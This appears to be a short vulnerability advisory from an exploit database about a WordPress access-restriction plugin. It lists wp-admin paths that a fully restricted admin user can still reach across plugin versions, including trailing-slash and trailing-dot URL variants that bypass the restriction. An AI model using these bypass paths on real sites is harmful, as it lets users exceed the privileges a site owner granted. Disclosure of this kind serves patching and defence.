## https://sploitus.com/exploit?id=WPEX-ID:A45C6ACA-3932-4869-92A5-812E3B980400
To reproduce it, install the plugin, create a new admin user and take all his privileges using the mentioned plugin (block all his access).
Result: You'll still be a able to access those paths.
A fully restricted Admin Class user still has access to the following paths:
v < 1.0.3
/wp-admin/options.php
/wp-admin/post.php?post=1&action=edit
/wp-admin/comment.php?action=editcomment&c=1
Comments > Approve / Unapprove
Comments > Reply
Comments > Spam
Comments > Trash / Delete Permanently
v <= 1.0.3
/wp-admin/options.php/
/wp-admin/post.php/?post=1&action=edit
/wp-admin/comment.php/?action=editcomment&c=1
v < 1.0.4
/wp-admin/options.php.